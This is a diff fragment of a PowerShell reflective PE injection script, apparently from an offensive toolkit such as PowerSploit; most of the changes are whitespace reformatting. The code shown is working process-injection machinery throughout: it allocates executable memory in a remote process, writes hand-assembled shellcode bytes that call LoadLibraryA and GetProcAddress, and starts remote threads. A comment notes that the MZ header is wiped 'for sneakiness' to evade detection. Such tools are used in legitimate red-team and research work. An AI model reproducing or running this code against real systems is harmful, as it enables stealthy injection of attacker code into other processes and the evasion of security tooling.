+            $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
+            $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($RemoteThreadHandle -eq [IntPtr]::Zero)
+            {
+                Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
+            }
+        }
+        #XP/Win8
+        else
+        {
+            #Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress"
+            $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
+        }
+
+        if ($RemoteThreadHandle -eq [IntPtr]::Zero)
+        {
+            Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
+        }
+
+        return $RemoteThreadHandle
+    }
+
+    Function Get-ImageNtHeaders
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [IntPtr]
+        $PEHandle,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Types
+        )
+
+        $NtHeadersInfo = New-Object System.Object
+
+        #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness
+        $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
+
+        #Get IMAGE_NT_HEADERS
+        [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
+        $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
+        $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
+
+        #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.
+        if ($imageNtHeaders64.Signature -ne 0x00004550)
+        {
+            throw "Invalid IMAGE_NT_HEADER signature."
+        }
+
+        if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
+        {
+            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
+            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
+        }
+        else
+        {
+            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
+            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
+            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
+        }
+
+        return $NtHeadersInfo
+    }
+
+
+    #This function will get the information needed to allocated space in memory for the PE
+    Function Get-PEBasicInfo
+    {
+        Param(
+        [Parameter( Position = 0, Mandatory = $true )]
+        [Byte[]]
+        $PEBytes,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Types
+        )
+
+        $PEInfo = New-Object System.Object
+
+        #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.
+        [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
+        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
+
+        #Get NtHeadersInfo
+        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
+
+        #Build a structure with the information which will be needed for allocating memory and writing the PE to memory
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
+
+        #Free the memory allocated above, this isn't where we allocate the PE to memory
+        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
+
+        return $PEInfo
+    }
+
+
+    #PEInfo must contain the following NoteProperties:
+    #   PEHandle: An IntPtr to the address the PE is loaded to in memory
+    Function Get-PEDetailedInfo
+    {
+        Param(
+        [Parameter( Position = 0, Mandatory = $true)]
+        [IntPtr]
+        $PEHandle,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Types,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants
+        )
+
+        if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
+        {
+            throw 'PEHandle is null or IntPtr.Zero'
+        }
+
+        $PEInfo = New-Object System.Object
+
+        #Get NtHeaders information
+        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
+
+        #Build the PEInfo object
+        $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
+        $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
+        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
+
+        if ($PEInfo.PE64Bit -eq $true)
+        {
+            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
+            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
+        }
+        else
+        {
+            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
+            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
+        }
+
+        if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
+        {
+            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
+        }
+        elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
+        {
+            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
+        }
+        else
+        {
+            Throw "PE file is not an EXE or DLL"
+        }
+
+        return $PEInfo
+    }
+
+    Function Import-DllInRemoteProcess
+    {
+        Param(
+        [Parameter(Position=0, Mandatory=$true)]
+        [IntPtr]
+        $RemoteProcHandle,
+
+        [Parameter(Position=1, Mandatory=$true)]
+        [IntPtr]
+        $ImportDllPathPtr
+        )
+
+        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
+
+        $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
+        $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
+        $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+        if ($RImportDllPathPtr -eq [IntPtr]::Zero)
+        {
+            Throw "Unable to allocate memory in the remote process"
+        }
+
+        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
+        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
+
+        if ($Success -eq $false)
+        {
+            Throw "Unable to write DLL path to remote process memory"
+        }
+        if ($DllPathSize -ne $NumBytesWritten)
+        {
+            Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
+        }
+
+        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
+        $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes
+
+        [IntPtr]$DllAddress = [IntPtr]::Zero
+        #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address
+        #   Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.
+        if ($PEInfo.PE64Bit -eq $true)
+        {
+            #Allocate memory for the address returned by LoadLibraryA
+            $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+            if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
+            {
+                Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
+            }
+
+            #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)
+            $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
+            $LoadLibrarySC2 = @(0x48, 0xba)
+            $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
+            $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
+
+            $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
+            $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
+            $SCPSMemOriginal = $SCPSMem
+
+            Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
+            [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+            Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
+            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+            Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
+            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+            Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
+            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
+
+            $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
+            if ($RSCAddr -eq [IntPtr]::Zero)
+            {
+                Throw "Unable to allocate memory in the remote process for shellcode"
+            }
+
+            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
+            if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
+            {
+                Throw "Unable to write shellcode to remote process memory."
+            }
+
+            $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
+            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
+            if ($Result -ne 0)
+            {
+                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
+            }
+
+            #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory
+            [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
+            $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
+            if ($Result -eq $false)
+            {
+                Throw "Call to ReadProcessMemory failed"
+            }
+            [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
+
+            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+        }
+        else
+        {
+            [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
+            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
+            if ($Result -ne 0)
+            {
+                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
+            }
+
+            [Int32]$ExitCode = 0
+            $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
+            if (($Result -eq 0) -or ($ExitCode -eq 0))
+            {
+                Throw "Call to GetExitCodeThread failed"
+            }
+
+            [IntPtr]$DllAddress = [IntPtr]$ExitCode
+        }
+
+        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+
+        return $DllAddress
+    }
+
+    Function Get-RemoteProcAddress
+    {
+        Param(
+        [Parameter(Position=0, Mandatory=$true)]
+        [IntPtr]
+        $RemoteProcHandle,
+
+        [Parameter(Position=1, Mandatory=$true)]
+        [IntPtr]
+        $RemoteDllHandle,
+
+        [Parameter(Position=2, Mandatory=$true)]
+        [IntPtr]
+        $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing)
 
         [Parameter(Position=3, Mandatory=$true)]
         [Bool]
         $LoadByOrdinal
-		)
+        )
 
-		$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
+        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
 
-		[IntPtr]$RFuncNamePtr = [IntPtr]::Zero   #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal
+        [IntPtr]$RFuncNamePtr = [IntPtr]::Zero   #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal
         #If not loading by ordinal, write the function name to the remote process memory
         if (-not $LoadByOrdinal)
         {
-        	$FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)
-
-		    #Write FunctionName to memory (will be used in GetProcAddress)
-		    $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
-		    $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-		    if ($RFuncNamePtr -eq [IntPtr]::Zero)
-		    {
-			    Throw "Unable to allocate memory in the remote process"
-		    }
-
-		    [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
-		    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
-		    if ($Success -eq $false)
-		    {
-			    Throw "Unable to write DLL path to remote process memory"
-		    }
-		    if ($FunctionNameSize -ne $NumBytesWritten)
-		    {
-			    Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
-		    }
+            $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)
+
+            #Write FunctionName to memory (will be used in GetProcAddress)
+            $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
+            $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+            if ($RFuncNamePtr -eq [IntPtr]::Zero)
+            {
+                Throw "Unable to allocate memory in the remote process"
+            }
+
+            [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
+            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
+            if ($Success -eq $false)
+            {
+                Throw "Unable to write DLL path to remote process memory"
+            }
+            if ($FunctionNameSize -ne $NumBytesWritten)
+            {
+                Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
+            }
         }
         #If loading by ordinal, just set RFuncNamePtr to be the ordinal number
         else
         {
             $RFuncNamePtr = $FunctionNamePtr
         }
-		
-		#Get address of GetProcAddress
-		$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
-		$GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes
-
-		
-		#Allocate memory for the address returned by GetProcAddress
-		$GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-		if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
-		{
-			Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
-		}
-		
-		
-		#Write Shellcode to the remote process which will call GetProcAddress
-		#Shellcode: GetProcAddress.asm
-		[Byte[]]$GetProcAddressSC = @()
-		if ($PEInfo.PE64Bit -eq $true)
-		{
-			$GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
-			$GetProcAddressSC2 = @(0x48, 0xba)
-			$GetProcAddressSC3 = @(0x48, 0xb8)
-			$GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
-			$GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
-		}
-		else
-		{
-			$GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
-			$GetProcAddressSC2 = @(0xb9)
-			$GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
-			$GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
-			$GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
-		}
-		$SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
-		$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
-		$SCPSMemOriginal = $SCPSMem
-		
-		Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-		Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-		Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-		Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-		Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
-		$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
-		
-		$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
-		if ($RSCAddr -eq [IntPtr]::Zero)
-		{
-			Throw "Unable to allocate memory in the remote process for shellcode"
-		}
-		[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
-		$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
-		if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
-		{
-			Throw "Unable to write shellcode to remote process memory."
-		}
-		
-		$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
-		$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
-		if ($Result -ne 0)
-		{
-			Throw "Call to CreateRemoteThread to call GetProcAddress failed."
-		}
-		
-		#The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory
-		[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
-		$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
-		if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
-		{
-			Throw "Call to ReadProcessMemory failed"
-		}
-		[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
+
+        #Get address of GetProcAddress
+        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
+        $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes
+
+        #Allocate memory for the address returned by GetProcAddress
+        $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+        if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
+        {
+            Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
+        }
+
+        #Write Shellcode to the remote process which will call GetProcAddress
+        #Shellcode: GetProcAddress.asm
+        [Byte[]]$GetProcAddressSC = @()
+        if ($PEInfo.PE64Bit -eq $true)
+        {
+            $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
+            $GetProcAddressSC2 = @(0x48, 0xba)
+            $GetProcAddressSC3 = @(0x48, 0xb8)
+            $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
+            $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
+        }
+        else
+        {
+            $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
+            $GetProcAddressSC2 = @(0xb9)
+            $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
+            $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
+            $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
+        }
+        $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
+        $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
+        $SCPSMemOriginal = $SCPSMem
+
+        Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+        Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+        Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+        Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+        Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
+        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
+
+        $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
+        if ($RSCAddr -eq [IntPtr]::Zero)
+        {
+            Throw "Unable to allocate memory in the remote process for shellcode"
+        }
+        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
+        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
+        if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
+        {
+            Throw "Unable to write shellcode to remote process memory."
+        }
+
+        $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
+        $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
+        if ($Result -ne 0)
+        {
+            Throw "Call to CreateRemoteThread to call GetProcAddress failed."
+        }
+
+        #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory
+        [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
+        $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
